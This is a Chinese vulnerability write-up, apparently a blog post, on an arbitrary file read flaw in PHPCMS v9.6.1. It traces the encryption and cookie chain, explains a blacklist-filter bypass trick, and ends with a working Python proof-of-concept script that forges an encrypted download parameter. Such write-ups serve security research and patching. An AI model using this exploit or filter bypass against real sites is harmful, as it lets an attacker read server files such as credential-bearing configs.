【漏洞分析】PHPCMS v9.6.1任意文件读取漏洞

0x01 漏洞分析

首先本次漏洞的问题函数不在于某一处函数或者语句,而是在与多方面的因素共同作用,最终可以进行绕过从而进行任意文件读取。
在phpcms中,有一个file_down函数用来下载文件的,该函数位于/phpcms/libs/functions/global.func.php

该函数就是一个正常的文件下载的函数,而调用这个函数的地方位于phpcms\modules\content\down.php

这里我们从下往上分析,首先调用file_down函数的fileurl参数中的<>被替换成空,往上看发现fileurl是当变量m存在时,变量s与之前的fileurl进行拼接而来的,再往上看发现之前的fileurl是变量f,因此我们要下载的文件参数是通过变量s和变量f拼接而来的!继续向上看,发现有一个parse_str($a_k),因此变量s和变量f是通过parse_str解析a_k变量来的,而a_k变量是通过get方式接收的,因此可控!所以就有风险了。

不过我们能够发现,变量a_k在传进来之后,被传入到了一个sys_auth函数重新赋值了,这个函数是phpcms中一个用来加解密的函数,位于/phpcms/libs/functions/global.func.php

这里通过pc_auth_key变量的密钥进行解密。

到目前为止我们需要的是一个使用pc_auth_key密钥,通过sys_auth函数加密过的a_k变量,并且其中的s和f变量是我们可控的,从而才能通过解析出来后拼接,然后带入到file_down函数下载任意文件。

幸运的是,就在down.php中的init函数可以满足这个条件

可以看到在init函数的后边,就有一个将a_k变量同pc_auth_key进行加密,并且之后传入了download函数

            $pc_auth_key = md5(pc_base::load_config('system','auth_key').$_SERVER['HTTP_USER_AGENT'].'down');
            $a_k = urlencode(sys_auth("i=$i&d=$d&s=$s&t=".SYS_TIME."&ip=".ip()."&m=".$m."&f=$f&modelid=".$modelid, 'ENCODE', $pc_auth_key));
            $downurl = '?m=content&c=down&a=download&a_k='.$a_k;

然后我们来从头看一下init函数。
首先通过get方式接受参数a_k,然后将这个a_k变量进行解密,然后通过safe_replace函数进行过滤,然后通过parse_str进行解析,从而得到了s变量和f变量。
所以这一阶段我们就需要一个加密过的a_k然后传给init函数。
这里用到了之前phpcms的一个sql注入的利用方式,在位于/phpcms/modules/attachment/attachments.php 的swfupload_json()函数,代码如下:

这里主要看一下src参数,这里src参数通过get方式接收之后用trim函数去除首尾的空白符,然后通过过safe_replace函数进行过滤,之后通过arr数组进行json编码,后面出入到了set_cookie函数中,而这个函数位于/phpcms/libs/classes/param.class.php,代码如下:

可以看到进入后会通过for循环遍历数组,然后src的值会被sys_auth加密!
现在我们可以回过头看一下之前一直被提到的safe_replace函数的作用吧,代码位于/phpcms/libs/functions/global.func.php,代码如下:

发现是将敏感符号替换为空,这个绕过就很好绕过了,比如当我们想输入单引号的时候%27,我们只要在其中加入一个位于黑名单的符号就可以了,比如%2;7,分号会被检测到然后替换成空,剩下了%27即为单引号了。

既然刚才在swfupload_json函数中找到了我们想要的结果,那么我们就看一下attachments类的构造函数,看看调用这个swfuplaod_json函数需要什么条件吧

函数最下面如果userid为空,会调用showmessage函数,那样程序会被中断的,因此就必须要userid有数据,那么往上看

$this->userid = $_SESSION['userid'] ? $_SESSION['userid'] : (param::get_cookie('_userid') ? param::get_cookie('_userid') : sys_auth($_POST['userid_flash'],'DECODE'));

上述语句是关键
以seesion方式接收userid参数,当$_SESSION['userid']有数据时,返回$_SESSION['userid'],当为空时,进行判断:
静态调用param类的get_cookie函数,并给该函数传递_userid字符串,如果返回不为空执行param::get_cookie('_userid'),如果为空就执行sys_auth($_POST['userid_flash'],'DECODE'))
sys_auth函数在这里进行解密操作,将用post方式接收到的userid_flash参数值,放进sys_auth函数进行解密
session实在服务器端生成的,在不能登录的情况下,session中的userid是空的,因此就会执行get_cookie函数,该函数代码如下

其中有sys_auth的解密操作,而如果get_cookie没结果也得DECODE,所以说这里decode是一个必须的操作,不过好消息是decode的目标是我们可以控制的,要么是cookie中的cookie_pre_userid,要么是post过去的userid_flash参数
这里以cookie为例,如果我们需要一个通过set_cookie的加密过的cookie,让它传送到这里,然后就可以通过get_cookie进行解密,从而绕过这里的限制

这里用wap模块的一个地方,代码位于/phpcms/modules/wap/index.php

通过第9行调用set_cookie函数,就可以生成一个加密好的cookie了。

0x02 总线

这次漏洞分析大概就是以寻找加密解密来进行分析的,总结了一下流程,如下

至此分析结束,下面设计一下poc

0x03 POC

import requests

url_1 = "http://127.0.0.1:8080/code_audit/phpcmsv9.6.1/install_package/index.php?m=wap&c=index&a=init&siteid=1"


r_g = requests.get(url_1)
for cookie in r_g.cookies:
    if '_siteid' in cookie.name:
        userid = cookie.value
        print "siteid: " + userid + "\n"

url_2 = "http://127.0.0.1:8080/code_audit/phpcmsv9.6.1/install_package/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=pad%3Dx%26i%3D1%26modelid%3D1%26catid%3D1%26d%3D1%26m%3D1%26s%3Dindex%26f%3D.p%25253chp"
# ?m=attachment&c=attachments&a=swfupload_json&aid=1&src=pad=x&i=1&modelid=1&catid=1&d=1&m=1&s=index&f=.p%253chp

data_1 = {'userid_flash': userid}
r_p = requests.post(url = url_2, data= data_1)

for cookie in r_p.cookies:
    if '_att_json' in cookie.name:
        att_json = cookie.value
        print "att_json: " + att_json + "\n"

key = "http://127.0.0.1:8080/code_audit/phpcmsv9.6.1/install_package/index.php?m=content&c=down&a=init&a_k=" + att_json
print key

0x04 演示

运行脚本

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 158,847评论 4 362
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,208评论 1 292
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,587评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,942评论 0 205
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,332评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,587评论 1 218
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,853评论 2 312
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,568评论 0 198
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,273评论 1 242
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,542评论 2 246
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,033评论 1 260
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,373评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,031评论 3 236
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,073评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,830评论 0 195
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,628评论 2 274
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,537评论 2 269

推荐阅读更多精彩内容